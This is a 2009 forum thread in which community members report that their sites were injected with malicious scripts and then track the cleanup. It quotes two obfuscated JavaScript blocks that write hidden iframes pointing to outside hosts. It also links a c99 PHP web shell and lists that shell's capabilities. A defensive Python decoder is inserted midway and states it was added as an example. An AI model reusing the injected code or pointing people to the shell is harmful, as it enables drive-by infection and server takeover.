Samapico Posted April 30, 2009
I experienced some weird redirecting + browser freezing issues on the SSC forum as well... I pm'ed Ace about this. Did it happen to anyone else?
Aceflyer Posted April 30, 2009
Split off from GetContinuum topic and moved to the SSC board. I do not have FTP access to sscouncil.com so I will PM BlueGoku about this. I too have noticed some weird issues on the forum lately but was unsure if it was just me. Thanks for reporting this.
Samapico (Author) Posted April 30, 2009
Just checked again... I get a connection to 'you-found-it.org' when loading the page, something about addtracker.com as well. And at the end of the source of the page:

CODE
// first injected block: splits the string on "E", turns the char codes back into markup and writes it into the page
var vaNNBExQNuSTIFDkdvyz = "E60E105E102E114E97E109E101E32E119E105E100E116E104E61E34E52E56E48E34E32E104E101E105E103E104E116E61E34E54E48E34E32E115E114E99E61E34E104E116E116E112E58E47E47E97E100E100E99E111E117E110E101E114E46E105E110E102E111E47E105E110E100E101E120E46E112E104E112E34E32E115E116E121E108E101E61E34E98E111E114E100E101E114E58E48E112E120E59E32E112E111E115E105E116E105E111E110E58E114E101E108E97E116E105E118E101E59E32E116E111E112E58E48E112E120E59E32E108E101E102E116E58E45E53E48E48E112E120E59E32E111E112E97E99E105E116E121E58E48E59E32E102E105E108E116E101E114E58E112E114E111E103E105E100E58E68E88E73E109E97E103E101E84E114E97E110E115E102E111E114E109E46E77E105E99E114E111E115E111E102E116E46E65E108E112E104E97E40E111E112E97E99E105E116E121E61E48E41E59E32E45E109E111E122E45E111E112E97E99E105E116E121E58E48E34E62E60E47E105E102E114E97E109E101E62";
var OtyTIUjVPpaKPoXRsUhG = vaNNBExQNuSTIFDkdvyz.split("E");
var PAaXFeIjZGjozhHHBrdQ = "";
for (var hDbwszOlUwrkwSHCwQlW=1; hDbwszOlUwrkwSHCwQlW<OtyTIUjVPpaKPoXRsUhG.length; hDbwszOlUwrkwSHCwQlW++) {PAaXFeIjZGjozhHHBrdQ += String.fromCharCode(OtyTIUjVPpaKPoXRsUhG[hDbwszOlUwrkwSHCwQlW]);}
document.write(PAaXFeIjZGjozhHHBrdQ)
<script type="text/javascript">
// second injected block: same scheme with the longer delimiter "EcFaA"
var oITtgjrSPDgMUalyvYkn = "EcFaA60EcFaA105EcFaA102EcFaA114EcFaA97EcFaA109EcFaA101EcFaA32EcFaA119EcFaA105EcFaA100EcFaA116EcFaA104EcFaA61EcFaA34EcFaA52EcFaA56EcFaA48EcFaA34EcFaA32EcFaA104EcFaA101EcFaA105EcFaA103EcFaA104EcFaA116EcFaA61EcFaA34EcFaA54EcFaA48EcFaA34EcFaA32EcFaA115EcFaA114EcFaA99EcFaA61EcFaA34EcFaA104EcFaA116EcFaA116EcFaA112EcFaA58EcFaA47EcFaA47EcFaA121EcFaA111EcFaA117EcFaA45EcFaA102EcFaA111EcFaA117EcFaA110EcFaA100EcFaA45EcFaA105EcFaA116EcFaA46EcFaA111EcFaA114EcFaA103EcFaA47EcFaA105EcFaA110EcFaA100EcFaA101EcFaA120EcFaA46EcFaA112EcFaA104EcFaA112EcFaA34EcFaA32EcFaA115EcFaA116EcFaA121EcFaA108EcFaA101EcFaA61EcFaA34EcFaA98EcFaA111EcFaA114EcFaA100EcFaA101EcFaA114EcFaA58EcFaA48EcFaA112EcFaA120EcFaA59EcFaA32EcFaA112EcFaA111EcFaA115EcFaA105EcFaA116EcFaA105EcFaA111EcFaA110EcFaA58EcFaA114EcFaA101EcFaA108EcFaA97EcFaA116EcFaA105EcFaA118EcFaA101EcFaA59EcFaA32EcFaA116EcFaA111EcFaA112EcFaA58EcFaA48EcFaA112EcFaA120EcFaA59EcFaA32EcFaA108EcFaA101EcFaA102EcFaA116EcFaA58EcFaA45EcFaA53EcFaA48EcFaA48EcFaA112EcFaA120EcFaA59EcFaA32EcFaA111EcFaA112EcFaA97EcFaA99EcFaA105EcFaA116EcFaA121EcFaA58EcFaA48EcFaA59EcFaA32EcFaA102EcFaA105EcFaA108EcFaA116EcFaA101EcFaA114EcFaA58EcFaA112EcFaA114EcFaA111EcFaA103EcFaA105EcFaA100EcFaA58EcFaA68EcFaA88EcFaA73EcFaA109EcFaA97EcFaA103EcFaA101EcFaA84EcFaA114EcFaA97EcFaA110EcFaA115EcFaA102EcFaA111EcFaA114EcFaA109EcFaA46EcFaA77EcFaA105EcFaA99EcFaA114EcFaA111EcFaA115EcFaA111EcFaA102EcFaA116EcFaA46EcFaA65EcFaA108EcFaA112EcFaA104EcFaA97EcFaA40EcFaA111EcFaA112EcFaA97EcFaA99EcFaA105EcFaA116EcFaA121EcFaA61EcFaA48EcFaA41EcFaA59EcFaA32EcFaA45EcFaA109EcFaA111EcFaA122EcFaA45EcFaA111EcFaA112EcFaA97EcFaA99EcFaA105EcFaA116EcFaA121EcFaA58EcFaA48EcFaA34EcFaA62EcFaA60EcFaA47EcFaA105EcFaA102EcFaA114EcFaA97EcFaA109EcFaA101EcFaA62";
var bMVBzEhfnUucdOVJxNbN = oITtgjrSPDgMUalyvYkn.split("EcFaA");
var QIZljLjejUSLgnMfruLf = "";
for (var OGHrUdBSqcfHlFtUQczA=1; OGHrUdBSqcfHlFtUQczA<bMVBzEhfnUucdOVJxNbN.length; OGHrUdBSqcfHlFtUQczA++) {QIZljLjejUSLgnMfruLf += String.fromCharCode(bMVBzEhfnUucdOVJxNbN[OGHrUdBSqcfHlFtUQczA]);}
document.write(QIZljLjejUSLgnMfruLf)

Looks suspicious

edit: ... codebox is useless lol... it puts a horizontal scrollbar, but still stretches the whole page with the text in it ... grr
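A defender-side decoder for the obfuscation shape in the script above, added here as an example (not code from the thread or from the SSC site): it takes the delimiter from the `.split()` call, rebuilds the markup the way the injected loop would, and reports the iframe's host and whether CSS hides it. The sample page, its host and the `_obfuscate` fixture are constructed for this example.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Shape of the injected script in the thread: a quoted string of repeated delimiter +
# decimal char code that is split() and rebuilt with String.fromCharCode, then written.
BLOB_RE = re.compile(r'"((?:[A-Za-z]+\d{1,3}){8,})"')
SPLIT_RE = re.compile(r'\.split\("([A-Za-z]+)"\)')
HIDDEN_CSS = ("opacity:0", "left:-500px", "visibility:hidden", "display:none")

def decode_charcode_blob(blob: str, delim: str) -> str:
    """Mirror the injected loop: split on the delimiter, skip the empty first
    element, and turn each decimal code back into a character."""
    return "".join(chr(int(p)) for p in blob.split(delim)[1:] if p.isdigit())

def scan_page(html: str) -> List[Dict]:
    """One finding per decoded fragment: iframe host, whether CSS hides it, markup."""
    findings = []
    # Longest delimiter first, so "EcFaA" is tried before a plain "E".
    delims = sorted(set(SPLIT_RE.findall(html)), key=len, reverse=True)
    for m in BLOB_RE.finditer(html):
        for delim in delims:
            decoded = decode_charcode_blob(m.group(1), delim)
            if "<" not in decoded:      # wrong delimiter, or not markup at all
                continue
            src = re.search(r'src="([^"]+)"', decoded)
            findings.append({
                "delimiter": delim,
                "host": urlparse(src.group(1)).hostname if src else None,
                "hidden": any(k in decoded for k in HIDDEN_CSS),
                "decoded": decoded,
            })
            break
    return findings

def _obfuscate(markup: str, delim: str) -> str:
    """Constructed test fixture only: encode markup the way the injected script did."""
    return "".join(f"{delim}{ord(c)}" for c in markup)

# Constructed sample page, not the forum's real source; the host is a placeholder.
SAMPLE_IFRAME = ('<iframe width="480" height="60" src="http://injected.example/index.php" '
                 'style="border:0px; position:relative; left:-500px; opacity:0"></iframe>')
SAMPLE_PAGE = ('<html><body><p>forum content</p><script type="text/javascript">var oITt = "'
               + _obfuscate(SAMPLE_IFRAME, "EcFaA") + '";var bMVB = oITt.split("EcFaA");'
               '/* rest of the injected loop omitted */</script></body></html>')

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        print(f"{f['host']} hidden={f['hidden']} delimiter={f['delimiter']!r}")
```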
Hakaku Posted April 30, 2009
Yeah I get it too, not just on the forum, but the entire sscouncil.com website as well. Actually, for that matter, it's not just the suspicious script at the bottom of the source, but there are weird numbers inserted before every paragraph (), and an entire list of malicious websites embedded near the end. It also seems to want to force the browser towards the bottom of the page.
Samapico (Author) Posted April 30, 2009
> Yeah I get it too, not just on the forum, but the entire sscouncil.com website as well. Actually, for that matter, it's not just the suspicious script at the bottom of the source, but there are weird numbers inserted before every paragraph (), and an entire list of malicious websites embedded near the end. It also seems to want to force the browser towards the bottom of the page.
My browser jammed once... :/
Aceflyer Posted April 30, 2009
Well let's hope BG gets to this. I will also send an email to Wonderer but I do not expect him to take direct action.
Samapico (Author) Posted May 1, 2009
Is there anything in common between Getcontinuum.com and the ssc forum? Host or whatever... I don't know much about these things... but since both sites were targeted with what seems to be the same attack, and if they have something in common, there might be other sites to check :/
p man Posted May 1, 2009
My computer started smoking after I went to this site. Any suggestions?
Edited May 1, 2009 by p man
Guest davinci Posted May 1, 2009
My mother self combusted after I went to this site. Any suggestions?
Aceflyer Posted May 1, 2009
Have now pinged Bargeld as well. Hopefully someone will get to this shortly.
L.C. Posted May 1, 2009
Ugh. hlrse.net was hit with a similar script attack about a month ago. But the only way it could have happened on HLRSE is if someone had FTP access and PHP abilities under public_html. As most of you may know, with PHP you can search directories beneath/above yours and get a directory listing as well as execute/manipulate files. With a situation like this at hlrse.net (not giving details as to why "a someone had FTP access" to a subdirectory in public_html), whether it was by accident or purpose, someone attempted to attack the server with a script that injected a line of PHP into the top of every file. It targeted more than just html and php files too, but I think the script was only successful enough to hit html and php files. The reason the script failed was because, if executed in a partitioned and safe environment, you would find that the script was full of errors. The main ingredients of that line had been in base64 encoding, which if decrypted, located a primary file on the server that was ALSO in base64. If decoded, you would get multitudes of chunks of base64 parts. In one of the parts we found the main part of this file. Unfortunately the privatepaste/pastebin's my host and I had regarding this have already been deleted.
The following is that "one liner" that was inserted (with PHP, base64 and eval()):
The main file ended up linking to/reading/executing/whatever from the following (NOTE -- Your AV will pick this text file of code up as "PHP/C99SHell.A trojan" according to NOD32): http://otoelektronik.net/shell/c99.txt
Although this has little relevance (or none at all) to THIS issue here in the community sites, some of you may find this stuff awesomely interesting. Perhaps this is an attempted script attack, no doubt. At least the server wasn't hijacked, or much damage done (hopefully).
Edited May 1, 2009 by L.C.
JoWie Posted May 1, 2009
I have played around locally with c99 before. Basically it's a nice interface to execute php commands, execute system commands, manipulate files. Contains some php exploits, can listen for connections, connect as an irc bot, brute-force ftp cracker, crack winnt passwords / unix passwd, sql interface. Of course anyone who runs his webserver as a privileged user is asking for trouble. It probably came from here: http://www.shellc0der.com/
RiiStar Posted May 2, 2009
XSS/HTML injection? O_o Bummer...
Edited May 2, 2009 by RiiStar
rootbear75 Posted May 2, 2009
> The main file ended up linking to/reading/executing/whatever from the following (NOTE -- Your AV will pick this text file of code up as "PHP/C99SHell.A trojan" according to NOD32):
Similar, but mine said "Trojan horse PHP/BackDoor.C99Shell"
BlueGoku Posted May 7, 2009
Ace and Maverick fixed all the sites that were affected.
Aceflyer Posted May 8, 2009
Still need to restore some lost content on beginner.getcontinuum.com actually, but yeah, all the script stuff is purged and everything else is done.
RiiStar Posted May 18, 2009
Sorry ace... but you're not done yet! http://i559.photobucket.com/albums/ss36/RiiStar/getcontinuum-site.jpg
Check for inserted html after body tags, java stuff also like before... Supposedly there might be bad/injected .htaccess files and if there is webalizer on the site, it could also add it into that directory also. The linked post below is about what one host provider did to help solve the issue. Avast Anti-Virus Forum where removal methods are being discussed...
Edited May 18, 2009 by RiiStar
Aceflyer Posted May 18, 2009
See the post in the GetContinuum thread. There was some vulnerability that allowed the hacker to re-hack all the sites once they were fixed. We're still working on addressing this.
»Lynx Posted May 23, 2009
Your Forum has been compromised... again. -L
Aceflyer Posted May 23, 2009
We know that. Again, the matter is in the hands of the host.
»Maverick Posted May 23, 2009
Yes, we're still having massive problems with the websites being re-infected over and over. Hopefully the host can fix the leak (if it's related to H-Sphere). I just restored sscouncil.com and the forum so it's free of any hack-crap but it's only a matter of time before it's getting infected again at this point.
Aceflyer Posted May 23, 2009
Yep, thanks so much Mav. Hopefully the host will finally get around to fixing whatever leak is causing these websites to be susceptible to the hacking.